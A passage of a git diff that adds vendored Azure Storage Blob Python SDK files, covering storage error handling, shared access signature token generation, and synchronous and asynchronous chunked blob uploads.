+ StorageErrorCode.container_being_deleted, + StorageErrorCode.queue_being_deleted, + StorageErrorCode.share_already_exists, + StorageErrorCode.share_being_deleted]: + raise_error = ResourceExistsError + except ValueError: + # Got an unknown error code + pass + + # Error message should include all the error properties + try: + error_message += "\nErrorCode:{}".format(error_code.value) + except AttributeError: + error_message += "\nErrorCode:{}".format(error_code) + for name, info in additional_data.items(): + error_message += "\n{}:{}".format(name, info) + + # No need to create an instance if it has already been serialized by the generated layer + if serialized: + storage_error.message = error_message + error = storage_error + else: + error = raise_error(message=error_message, response=storage_error.response) + # Ensure these properties are stored in the error instance as well (not just the error message) + error.error_code = error_code + error.additional_info = additional_data + # error.args is what's surfaced on the traceback - show error message in all cases + error.args = (error.message,) + try: + # `from None` prevents us from double printing the exception (suppresses generated layer error context) + exec("raise error from None") # pylint: disable=exec-used # nosec + except SyntaxError: + raise error + + +def parse_to_internal_user_delegation_key(service_user_delegation_key): + internal_user_delegation_key = UserDelegationKey() + internal_user_delegation_key.signed_oid = service_user_delegation_key.signed_oid + internal_user_delegation_key.signed_tid = service_user_delegation_key.signed_tid + internal_user_delegation_key.signed_start = _to_utc_datetime(service_user_delegation_key.signed_start) + internal_user_delegation_key.signed_expiry = _to_utc_datetime(service_user_delegation_key.signed_expiry) + internal_user_delegation_key.signed_service = service_user_delegation_key.signed_service + internal_user_delegation_key.signed_version = service_user_delegation_key.signed_version + internal_user_delegation_key.value = service_user_delegation_key.value + return internal_user_delegation_key diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/shared_access_signature.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/shared_access_signature.py new file mode 100644 index 0000000..f116890 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/shared_access_signature.py @@ -0,0 +1,230 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from datetime import date + +from .parser import _str, _to_utc_datetime +from .constants import X_MS_VERSION +from . import sign_string, url_quote + + +class QueryStringConstants(object): + SIGNED_SIGNATURE = 'sig' + SIGNED_PERMISSION = 'sp' + SIGNED_START = 'st' + SIGNED_EXPIRY = 'se' + SIGNED_RESOURCE = 'sr' + SIGNED_IDENTIFIER = 'si' + SIGNED_IP = 'sip' + SIGNED_PROTOCOL = 'spr' + SIGNED_VERSION = 'sv' + SIGNED_CACHE_CONTROL = 'rscc' + SIGNED_CONTENT_DISPOSITION = 'rscd' + SIGNED_CONTENT_ENCODING = 'rsce' + SIGNED_CONTENT_LANGUAGE = 'rscl' + SIGNED_CONTENT_TYPE = 'rsct' + START_PK = 'spk' + START_RK = 'srk' + END_PK = 'epk' + END_RK = 'erk' + SIGNED_RESOURCE_TYPES = 'srt' + SIGNED_SERVICES = 'ss' + SIGNED_OID = 'skoid' + SIGNED_TID = 'sktid' + SIGNED_KEY_START = 'skt' + SIGNED_KEY_EXPIRY = 'ske' + SIGNED_KEY_SERVICE = 'sks' + SIGNED_KEY_VERSION = 'skv' + + # for blob only + SIGNED_ENCRYPTION_SCOPE = 'ses' + + # for ADLS + SIGNED_AUTHORIZED_OID = 'saoid' + SIGNED_UNAUTHORIZED_OID = 'suoid' + SIGNED_CORRELATION_ID = 'scid' + SIGNED_DIRECTORY_DEPTH = 'sdd' + + @staticmethod + def to_list(): + return [ + QueryStringConstants.SIGNED_SIGNATURE, + QueryStringConstants.SIGNED_PERMISSION, + QueryStringConstants.SIGNED_START, + QueryStringConstants.SIGNED_EXPIRY, + QueryStringConstants.SIGNED_RESOURCE, + QueryStringConstants.SIGNED_IDENTIFIER, + QueryStringConstants.SIGNED_IP, + QueryStringConstants.SIGNED_PROTOCOL, + QueryStringConstants.SIGNED_VERSION, + QueryStringConstants.SIGNED_CACHE_CONTROL, + QueryStringConstants.SIGNED_CONTENT_DISPOSITION, + QueryStringConstants.SIGNED_CONTENT_ENCODING, + QueryStringConstants.SIGNED_CONTENT_LANGUAGE, + QueryStringConstants.SIGNED_CONTENT_TYPE, + QueryStringConstants.START_PK, + QueryStringConstants.START_RK, + QueryStringConstants.END_PK, + QueryStringConstants.END_RK, + QueryStringConstants.SIGNED_RESOURCE_TYPES, + QueryStringConstants.SIGNED_SERVICES, + QueryStringConstants.SIGNED_OID, + QueryStringConstants.SIGNED_TID, + QueryStringConstants.SIGNED_KEY_START, + QueryStringConstants.SIGNED_KEY_EXPIRY, + QueryStringConstants.SIGNED_KEY_SERVICE, + QueryStringConstants.SIGNED_KEY_VERSION, + # for blob only + QueryStringConstants.SIGNED_ENCRYPTION_SCOPE, + # for ADLS + QueryStringConstants.SIGNED_AUTHORIZED_OID, + QueryStringConstants.SIGNED_UNAUTHORIZED_OID, + QueryStringConstants.SIGNED_CORRELATION_ID, + QueryStringConstants.SIGNED_DIRECTORY_DEPTH, + ] + + +class SharedAccessSignature(object): + ''' + Provides a factory for creating account access + signature tokens with an account name and account key. Users can either + use the factory or can construct the appropriate service and use the + generate_*_shared_access_signature method directly. + ''' + + def __init__(self, account_name, account_key, x_ms_version=X_MS_VERSION): + ''' + :param str account_name: + The storage account name used to generate the shared access signatures. + :param str account_key: + The access key to generate the shares access signatures. + :param str x_ms_version: + The service version used to generate the shared access signatures. + ''' + self.account_name = account_name + self.account_key = account_key + self.x_ms_version = x_ms_version + + def generate_account(self, services, resource_types, permission, expiry, start=None, + ip=None, protocol=None, **kwargs): + ''' + Generates a shared access signature for the account. + Use the returned signature with the sas_token parameter of the service + or to create a new account object. + + :param ResourceTypes resource_types: + Specifies the resource types that are accessible with the account + SAS. You can combine values to provide access to more than one + resource type. + :param AccountSasPermissions permission: + The permissions associated with the shared access signature. The + user is restricted to operations allowed by the permissions. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has been + specified in an associated stored access policy. You can combine + values to provide more than one permission. + :param expiry: + The time at which the shared access signature becomes invalid. + Required unless an id is given referencing a stored access policy + which contains this field. This field must be omitted if it has + been specified in an associated stored access policy. Azure will always + convert values to UTC. If a date is passed in without timezone info, it + is assumed to be UTC. + :type expiry: datetime or str + :param start: + The time at which the shared access signature becomes valid. If + omitted, start time for this call is assumed to be the time when the + storage service receives the request. Azure will always convert values + to UTC. If a date is passed in without timezone info, it is assumed to + be UTC. + :type start: datetime or str + :param str ip: + Specifies an IP address or a range of IP addresses from which to accept requests. + If the IP address from which the request originates does not match the IP address + or address range specified on the SAS token, the request is not authenticated. + For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS + restricts the request to those IP addresses. + :param str protocol: + Specifies the protocol permitted for a request made. The default value + is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values. + ''' + sas = _SharedAccessHelper() + sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version) + sas.add_account(services, resource_types) + sas.add_encryption_scope(**kwargs) + sas.add_account_signature(self.account_name, self.account_key) + + return sas.get_token() + + +class _SharedAccessHelper(object): + def __init__(self): + self.query_dict = {} + + def _add_query(self, name, val): + if val: + self.query_dict[name] = _str(val) if val is not None else None + + def add_encryption_scope(self, **kwargs): + self._add_query(QueryStringConstants.SIGNED_ENCRYPTION_SCOPE, kwargs.pop('encryption_scope', None)) + + def add_base(self, permission, expiry, start, ip, protocol, x_ms_version): + if isinstance(start, date): + start = _to_utc_datetime(start) + + if isinstance(expiry, date): + expiry = _to_utc_datetime(expiry) + + self._add_query(QueryStringConstants.SIGNED_START, start) + self._add_query(QueryStringConstants.SIGNED_EXPIRY, expiry) + self._add_query(QueryStringConstants.SIGNED_PERMISSION, permission) + self._add_query(QueryStringConstants.SIGNED_IP, ip) + self._add_query(QueryStringConstants.SIGNED_PROTOCOL, protocol) + self._add_query(QueryStringConstants.SIGNED_VERSION, x_ms_version) + + def add_resource(self, resource): + self._add_query(QueryStringConstants.SIGNED_RESOURCE, resource) + + def add_id(self, policy_id): + self._add_query(QueryStringConstants.SIGNED_IDENTIFIER, policy_id) + + def add_account(self, services, resource_types): + self._add_query(QueryStringConstants.SIGNED_SERVICES, services) + self._add_query(QueryStringConstants.SIGNED_RESOURCE_TYPES, resource_types) + + def add_override_response_headers(self, cache_control, + content_disposition, + content_encoding, + content_language, + content_type): + self._add_query(QueryStringConstants.SIGNED_CACHE_CONTROL, cache_control) + self._add_query(QueryStringConstants.SIGNED_CONTENT_DISPOSITION, content_disposition) + self._add_query(QueryStringConstants.SIGNED_CONTENT_ENCODING, content_encoding) + self._add_query(QueryStringConstants.SIGNED_CONTENT_LANGUAGE, content_language) + self._add_query(QueryStringConstants.SIGNED_CONTENT_TYPE, content_type) + + def add_account_signature(self, account_name, account_key): + def get_value_to_append(query): + return_value = self.query_dict.get(query) or '' + return return_value + '\n' + + string_to_sign = \ + (account_name + '\n' + + get_value_to_append(QueryStringConstants.SIGNED_PERMISSION) + + get_value_to_append(QueryStringConstants.SIGNED_SERVICES) + + get_value_to_append(QueryStringConstants.SIGNED_RESOURCE_TYPES) + + get_value_to_append(QueryStringConstants.SIGNED_START) + + get_value_to_append(QueryStringConstants.SIGNED_EXPIRY) + + get_value_to_append(QueryStringConstants.SIGNED_IP) + + get_value_to_append(QueryStringConstants.SIGNED_PROTOCOL) + + get_value_to_append(QueryStringConstants.SIGNED_VERSION) + + get_value_to_append(QueryStringConstants.SIGNED_ENCRYPTION_SCOPE)) + + self._add_query(QueryStringConstants.SIGNED_SIGNATURE, + sign_string(account_key, string_to_sign)) + + def get_token(self): + return '&'.join(['{0}={1}'.format(n, url_quote(v)) for n, v in self.query_dict.items() if v is not None]) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads.py new file mode 100644 index 0000000..fa5c791 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads.py @@ -0,0 +1,620 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +from concurrent import futures +from io import (BytesIO, IOBase, SEEK_CUR, SEEK_END, SEEK_SET, UnsupportedOperation) +from threading import Lock +from itertools import islice +from math import ceil + +import six + +from azure.core.tracing.common import with_current_context + +from . import encode_base64, url_quote +from .request_handlers import get_length +from .response_handlers import return_response_headers +from .encryption import get_blob_encryptor_and_padder + + +_LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE = 4 * 1024 * 1024 +_ERROR_VALUE_SHOULD_BE_SEEKABLE_STREAM = "{0} should be a seekable file-like/io.IOBase type stream object." + + +def _parallel_uploads(executor, uploader, pending, running): + range_ids = [] + while True: + # Wait for some download to finish before adding a new one + done, running = futures.wait(running, return_when=futures.FIRST_COMPLETED) + range_ids.extend([chunk.result() for chunk in done]) + try: + for _ in range(0, len(done)): + next_chunk = next(pending) + running.add(executor.submit(with_current_context(uploader), next_chunk)) + except StopIteration: + break + + # Wait for the remaining uploads to finish + done, _running = futures.wait(running) + range_ids.extend([chunk.result() for chunk in done]) + return range_ids + + +def upload_data_chunks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + validate_content=None, + encryption_options=None, + progress_hook=None, + **kwargs): + + if encryption_options: + encryptor, padder = get_blob_encryptor_and_padder( + encryption_options.get('cek'), + encryption_options.get('vector'), + uploader_class is not PageBlobChunkUploader) + kwargs['encryptor'] = encryptor + kwargs['padder'] = padder + + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with parallelism + kwargs['modified_access_conditions'] = None + + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + validate_content=validate_content, + progress_hook=progress_hook, + **kwargs) + if parallel: + with futures.ThreadPoolExecutor(max_concurrency) as executor: + upload_tasks = uploader.get_chunk_streams() + running_futures = [ + executor.submit(with_current_context(uploader.process_chunk), u) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = _parallel_uploads(executor, uploader.process_chunk, upload_tasks, running_futures) + else: + range_ids = [uploader.process_chunk(result) for result in uploader.get_chunk_streams()] + if any(range_ids): + return [r[1] for r in sorted(range_ids, key=lambda r: r[0])] + return uploader.response_headers + + +def upload_substream_blocks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + progress_hook=None, + **kwargs): + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with parallelism + kwargs['modified_access_conditions'] = None + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + progress_hook=progress_hook, + **kwargs) + + if parallel: + with futures.ThreadPoolExecutor(max_concurrency) as executor: + upload_tasks = uploader.get_substream_blocks() + running_futures = [ + executor.submit(with_current_context(uploader.process_substream_block), u) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = _parallel_uploads(executor, uploader.process_substream_block, upload_tasks, running_futures) + else: + range_ids = [uploader.process_substream_block(b) for b in uploader.get_substream_blocks()] + if any(range_ids): + return sorted(range_ids) + return [] + + +class _ChunkUploader(object): # pylint: disable=too-many-instance-attributes + + def __init__( + self, service, + total_size, + chunk_size, + stream, + parallel, + encryptor=None, + padder=None, + progress_hook=None, + **kwargs): + self.service = service + self.total_size = total_size + self.chunk_size = chunk_size + self.stream = stream + self.parallel = parallel + + # Stream management + self.stream_start = stream.tell() if parallel else None + self.stream_lock = Lock() if parallel else None + + # Progress feedback + self.progress_total = 0 + self.progress_lock = Lock() if parallel else None + self.progress_hook = progress_hook + + # Encryption + self.encryptor = encryptor + self.padder = padder + self.response_headers = None + self.etag = None + self.last_modified = None + self.request_options = kwargs + + def get_chunk_streams(self): + index = 0 + while True: + data = b"" + read_size = self.chunk_size + + # Buffer until we either reach the end of the stream or get a whole chunk. + while True: + if self.total_size: + read_size = min(self.chunk_size - len(data), self.total_size - (index + len(data))) + temp = self.stream.read(read_size) + if not isinstance(temp, six.binary_type): + raise TypeError("Blob data should be of type bytes.") + data += temp or b"" + + # We have read an empty string and so are at the end + # of the buffer or we have read a full chunk. + if temp == b"" or len(data) == self.chunk_size: + break + + if len(data) == self.chunk_size: + if self.padder: + data = self.padder.update(data) + if self.encryptor: + data = self.encryptor.update(data) + yield index, data + else: + if self.padder: + data = self.padder.update(data) + self.padder.finalize() + if self.encryptor: + data = self.encryptor.update(data) + self.encryptor.finalize() + if data: + yield index, data + break + index += len(data) + + def process_chunk(self, chunk_data): + chunk_bytes = chunk_data[1] + chunk_offset = chunk_data[0] + return self._upload_chunk_with_progress(chunk_offset, chunk_bytes) + + def _update_progress(self, length): + if self.progress_lock is not None: + with self.progress_lock: + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + self.progress_hook(self.progress_total, self.total_size) + + def _upload_chunk(self, chunk_offset, chunk_data): + raise NotImplementedError("Must be implemented by child class.") + + def _upload_chunk_with_progress(self, chunk_offset, chunk_data): + range_id = self._upload_chunk(chunk_offset, chunk_data) + self._update_progress(len(chunk_data)) + return range_id + + def get_substream_blocks(self): + assert self.chunk_size is not None + lock = self.stream_lock + blob_length = self.total_size + + if blob_length is None: + blob_length = get_length(self.stream) + if blob_length is None: + raise ValueError("Unable to determine content length of upload data.") + + blocks = int(ceil(blob_length / (self.chunk_size * 1.0))) + last_block_size = self.chunk_size if blob_length % self.chunk_size == 0 else blob_length % self.chunk_size + + for i in range(blocks): + index = i * self.chunk_size + length = last_block_size if i == blocks - 1 else self.chunk_size + yield index, SubStream(self.stream, index, length, lock) + + def process_substream_block(self, block_data): + return self._upload_substream_block_with_progress(block_data[0], block_data[1]) + + def _upload_substream_block(self, index, block_stream): + raise NotImplementedError("Must be implemented by child class.") + + def _upload_substream_block_with_progress(self, index, block_stream): + range_id = self._upload_substream_block(index, block_stream) + self._update_progress(len(block_stream)) + return range_id + + def set_response_properties(self, resp): + self.etag = resp.etag + self.last_modified = resp.last_modified + + +class BlockBlobChunkUploader(_ChunkUploader): + + def __init__(self, *args, **kwargs): + kwargs.pop("modified_access_conditions", None) + super(BlockBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + def _upload_chunk(self, chunk_offset, chunk_data): + # TODO: This is incorrect, but works with recording. + index = '{0:032d}'.format(chunk_offset) + block_id = encode_base64(url_quote(encode_base64(index))) + self.service.stage_block( + block_id, + len(chunk_data), + chunk_data, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + return index, block_id + + def _upload_substream_block(self, index, block_stream): + try: + block_id = 'BlockId{}'.format("%05d" % (index/self.chunk_size)) + self.service.stage_block( + block_id, + len(block_stream), + block_stream, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + finally: + block_stream.close() + return block_id + + +class PageBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _is_chunk_empty(self, chunk_data): + # read until non-zero byte is encountered + # if reached the end without returning, then chunk_data is all 0's + return not any(bytearray(chunk_data)) + + def _upload_chunk(self, chunk_offset, chunk_data): + # avoid uploading the empty pages + if not self._is_chunk_empty(chunk_data): + chunk_end = chunk_offset + len(chunk_data) - 1 + content_range = "bytes={0}-{1}".format(chunk_offset, chunk_end) + computed_md5 = None + self.response_headers = self.service.upload_pages( + body=chunk_data, + content_length=len(chunk_data), + transactional_content_md5=computed_md5, + range=content_range, + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = self.response_headers['etag'] + + def _upload_substream_block(self, index, block_stream): + pass + + +class AppendBlobChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def __init__(self, *args, **kwargs): + super(AppendBlobChunkUploader, self).__init__(*args, **kwargs) + self.current_length = None + + def _upload_chunk(self, chunk_offset, chunk_data): + if self.current_length is None: + self.response_headers = self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + self.current_length = int(self.response_headers["blob_append_offset"]) + else: + self.request_options['append_position_access_conditions'].append_position = \ + self.current_length + chunk_offset + self.response_headers = self.service.append_block( + body=chunk_data, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + def _upload_substream_block(self, index, block_stream): + pass + + +class DataLakeFileChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _upload_chunk(self, chunk_offset, chunk_data): + # avoid uploading the empty pages + self.response_headers = self.service.append_data( + body=chunk_data, + position=chunk_offset, + content_length=len(chunk_data), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + + if not self.parallel and self.request_options.get('modified_access_conditions'): + self.request_options['modified_access_conditions'].if_match = self.response_headers['etag'] + + def _upload_substream_block(self, index, block_stream): + try: + self.service.append_data( + body=block_stream, + position=index, + content_length=len(block_stream), + cls=return_response_headers, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + finally: + block_stream.close() + + +class FileChunkUploader(_ChunkUploader): # pylint: disable=abstract-method + + def _upload_chunk(self, chunk_offset, chunk_data): + length = len(chunk_data) + chunk_end = chunk_offset + length - 1 + response = self.service.upload_range( + chunk_data, + chunk_offset, + length, + data_stream_total=self.total_size, + upload_stream_current=self.progress_total, + **self.request_options + ) + return 'bytes={0}-{1}'.format(chunk_offset, chunk_end), response + + # TODO: Implement this method. + def _upload_substream_block(self, index, block_stream): + pass + + +class SubStream(IOBase): + + def __init__(self, wrapped_stream, stream_begin_index, length, lockObj): + # Python 2.7: file-like objects created with open() typically support seek(), but are not + # derivations of io.IOBase and thus do not implement seekable(). + # Python > 3.0: file-like objects created with open() are derived from io.IOBase. + try: + # only the main thread runs this, so there's no need grabbing the lock + wrapped_stream.seek(0, SEEK_CUR) + except: + raise ValueError("Wrapped stream must support seek().") + + self._lock = lockObj + self._wrapped_stream = wrapped_stream + self._position = 0 + self._stream_begin_index = stream_begin_index + self._length = length + self._buffer = BytesIO() + + # we must avoid buffering more than necessary, and also not use up too much memory + # so the max buffer size is capped at 4MB + self._max_buffer_size = ( + length if length < _LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE else _LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE + ) + self._current_buffer_start = 0 + self._current_buffer_size = 0 + super(SubStream, self).__init__() + + def __len__(self): + return self._length + + def close(self): + if self._buffer: + self._buffer.close() + self._wrapped_stream = None + IOBase.close(self) + + def fileno(self): + return self._wrapped_stream.fileno() + + def flush(self): + pass + + def read(self, size=None): + if self.closed: # pylint: disable=using-constant-test + raise ValueError("Stream is closed.") + + if size is None: + size = self._length - self._position + + # adjust if out of bounds + if size + self._position >= self._length: + size = self._length - self._position + + # return fast + if size == 0 or self._buffer.closed: + return b"" + + # attempt first read from the read buffer and update position + read_buffer = self._buffer.read(size) + bytes_read = len(read_buffer) + bytes_remaining = size - bytes_read + self._position += bytes_read + + # repopulate the read buffer from the underlying stream to fulfill the request + # ensure the seek and read operations are done atomically (only if a lock is provided) + if bytes_remaining > 0: + with self._buffer: + # either read in the max buffer size specified on the class + # or read in just enough data for the current block/sub stream + current_max_buffer_size = min(self._max_buffer_size, self._length - self._position) + + # lock is only defined if max_concurrency > 1 (parallel uploads) + if self._lock: + with self._lock: + # reposition the underlying stream to match the start of the data to read + absolute_position = self._stream_begin_index + self._position + self._wrapped_stream.seek(absolute_position, SEEK_SET) + # If we can't seek to the right location, our read will be corrupted so fail fast. + if self._wrapped_stream.tell() != absolute_position: + raise IOError("Stream failed to seek to the desired location.") + buffer_from_stream = self._wrapped_stream.read(current_max_buffer_size) + else: + absolute_position = self._stream_begin_index + self._position + # It's possible that there's connection problem during data transfer, + # so when we retry we don't want to read from current position of wrapped stream, + # instead we should seek to where we want to read from. + if self._wrapped_stream.tell() != absolute_position: + self._wrapped_stream.seek(absolute_position, SEEK_SET) + + buffer_from_stream = self._wrapped_stream.read(current_max_buffer_size) + + if buffer_from_stream: + # update the buffer with new data from the wrapped stream + # we need to note down the start position and size of the buffer, in case seek is performed later + self._buffer = BytesIO(buffer_from_stream) + self._current_buffer_start = self._position + self._current_buffer_size = len(buffer_from_stream) + + # read the remaining bytes from the new buffer and update position + second_read_buffer = self._buffer.read(bytes_remaining) + read_buffer += second_read_buffer + self._position += len(second_read_buffer) + + return read_buffer + + def readable(self): + return True + + def readinto(self, b): + raise UnsupportedOperation + + def seek(self, offset, whence=0): + if whence is SEEK_SET: + start_index = 0 + elif whence is SEEK_CUR: + start_index = self._position + elif whence is SEEK_END: + start_index = self._length + offset = -offset + else: + raise ValueError("Invalid argument for the 'whence' parameter.") + + pos = start_index + offset + + if pos > self._length: + pos = self._length + elif pos < 0: + pos = 0 + + # check if buffer is still valid + # if not, drop buffer + if pos < self._current_buffer_start or pos >= self._current_buffer_start + self._current_buffer_size: + self._buffer.close() + self._buffer = BytesIO() + else: # if yes seek to correct position + delta = pos - self._current_buffer_start + self._buffer.seek(delta, SEEK_SET) + + self._position = pos + return pos + + def seekable(self): + return True + + def tell(self): + return self._position + + def write(self): + raise UnsupportedOperation + + def writelines(self): + raise UnsupportedOperation + + def writeable(self): + return False + + +class IterStreamer(object): + """ + File-like streaming iterator. + """ + + def __init__(self, generator, encoding="UTF-8"): + self.generator = generator + self.iterator = iter(generator) + self.leftover = b"" + self.encoding = encoding + + def __len__(self): + return self.generator.__len__() + + def __iter__(self): + return self.iterator + + def seekable(self): + return False + + def __next__(self): + return next(self.iterator) + + next = __next__ # Python 2 compatibility. + + def tell(self, *args, **kwargs): + raise UnsupportedOperation("Data generator does not support tell.") + + def seek(self, *args, **kwargs): + raise UnsupportedOperation("Data generator is unseekable.") + + def read(self, size): + data = self.leftover + count = len(self.leftover) + try: + while count < size: + chunk = self.__next__() + if isinstance(chunk, six.text_type): + chunk = chunk.encode(self.encoding) + data += chunk + count += len(chunk) + # This means count < size and what's leftover will be returned in this call. + except StopIteration: + self.leftover = b"" + + if count >= size: + self.leftover = data[size:] + + return data[:size] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads_async.py new file mode 100644 index 0000000..4892758 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/uploads_async.py @@ -0,0 +1,412 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +import asyncio +from asyncio import Lock +from itertools import islice +import threading + +from math import ceil + +import six + +from . import encode_base64, url_quote +from .request_handlers import get_length +from .response_handlers import return_response_headers +from .encryption import get_blob_encryptor_and_padder +from .uploads import SubStream, IterStreamer # pylint: disable=unused-import + + +_LARGE_BLOB_UPLOAD_MAX_READ_BUFFER_SIZE = 4 * 1024 * 1024 +_ERROR_VALUE_SHOULD_BE_SEEKABLE_STREAM = '{0} should be a seekable file-like/io.IOBase type stream object.' + + +async def _parallel_uploads(uploader, pending, running): + range_ids = [] + while True: + # Wait for some download to finish before adding a new one + done, running = await asyncio.wait(running, return_when=asyncio.FIRST_COMPLETED) + range_ids.extend([chunk.result() for chunk in done]) + try: + for _ in range(0, len(done)): + next_chunk = next(pending) + running.add(asyncio.ensure_future(uploader(next_chunk))) + except StopIteration: + break + + # Wait for the remaining uploads to finish + if running: + done, _running = await asyncio.wait(running) + range_ids.extend([chunk.result() for chunk in done]) + return range_ids + + +async def upload_data_chunks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + encryption_options=None, + progress_hook=None, + **kwargs): + + if encryption_options: + encryptor, padder = get_blob_encryptor_and_padder( + encryption_options.get('cek'), + encryption_options.get('vector'), + uploader_class is not PageBlobChunkUploader) + kwargs['encryptor'] = encryptor + kwargs['padder'] = padder + + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with parallelism + kwargs['modified_access_conditions'] = None + + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + progress_hook=progress_hook, + **kwargs) + + if parallel: + upload_tasks = uploader.get_chunk_streams() + running_futures = [ + asyncio.ensure_future(uploader.process_chunk(u)) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = await _parallel_uploads(uploader.process_chunk, upload_tasks, running_futures) + else: + range_ids = [] + for chunk in uploader.get_chunk_streams(): + range_ids.append(await uploader.process_chunk(chunk)) + + if any(range_ids): + return [r[1] for r in sorted(range_ids, key=lambda r: r[0])] + return uploader.response_headers + + +async def upload_substream_blocks( + service=None, + uploader_class=None, + total_size=None, + chunk_size=None, + max_concurrency=None, + stream=None, + progress_hook=None, + **kwargs): + parallel = max_concurrency > 1 + if parallel and 'modified_access_conditions' in kwargs: + # Access conditions do not work with parallelism + kwargs['modified_access_conditions'] = None + uploader = uploader_class( + service=service, + total_size=total_size, + chunk_size=chunk_size, + stream=stream, + parallel=parallel, + progress_hook=progress_hook, + **kwargs) + + if parallel: + upload_tasks = uploader.get_substream_blocks() + running_futures = [ + asyncio.ensure_future(uploader.process_substream_block(u)) + for u in islice(upload_tasks, 0, max_concurrency) + ] + range_ids = await _parallel_uploads(uploader.process_substream_block, upload_tasks, running_futures) + else: + range_ids = [] + for block in uploader.get_substream_blocks(): + range_ids.append(await uploader.process_substream_block(block)) + if any(range_ids): + return sorted(range_ids) + return + + +class _ChunkUploader(object): # pylint: disable=too-many-instance-attributes + + def __init__( + self, service, + total_size, + chunk_size, + stream, + parallel, + encryptor=None, + padder=None, + progress_hook=None, + **kwargs): + self.service = service + self.total_size = total_size + self.chunk_size = chunk_size + self.stream = stream + self.parallel = parallel + + # Stream management + self.stream_start = stream.tell() if parallel else None + self.stream_lock = threading.Lock() if parallel else None + + # Progress feedback + self.progress_total = 0 + self.progress_lock = Lock() if parallel else None + self.progress_hook = progress_hook + + # Encryption + self.encryptor = encryptor + self.padder = padder + self.response_headers = None + self.etag = None + self.last_modified = None + self.request_options = kwargs + + def get_chunk_streams(self): + index = 0 + while True: + data = b'' + read_size = self.chunk_size + + # Buffer until we either reach the end of the stream or get a whole chunk. + while True: + if self.total_size: + read_size = min(self.chunk_size - len(data), self.total_size - (index + len(data))) + temp = self.stream.read(read_size) + if not isinstance(temp, six.binary_type): + raise TypeError('Blob data should be of type bytes.') + data += temp or b"" + + # We have read an empty string and so are at the end + # of the buffer or we have read a full chunk. + if temp == b'' or len(data) == self.chunk_size: + break + + if len(data) == self.chunk_size: + if self.padder: + data = self.padder.update(data) + if self.encryptor: + data = self.encryptor.update(data) + yield index, data + else: + if self.padder: + data = self.padder.update(data) + self.padder.finalize() + if self.encryptor: + data = self.encryptor.update(data) + self.encryptor.finalize() + if data: + yield index, data + break + index += len(data) + + async def process_chunk(self, chunk_data): + chunk_bytes = chunk_data[1] + chunk_offset = chunk_data[0] + return await self._upload_chunk_with_progress(chunk_offset, chunk_bytes) + + async def _update_progress(self, length): + if self.progress_lock is not None: + async with self.progress_lock: + self.progress_total += length + else: + self.progress_total += length + + if self.progress_hook: + await 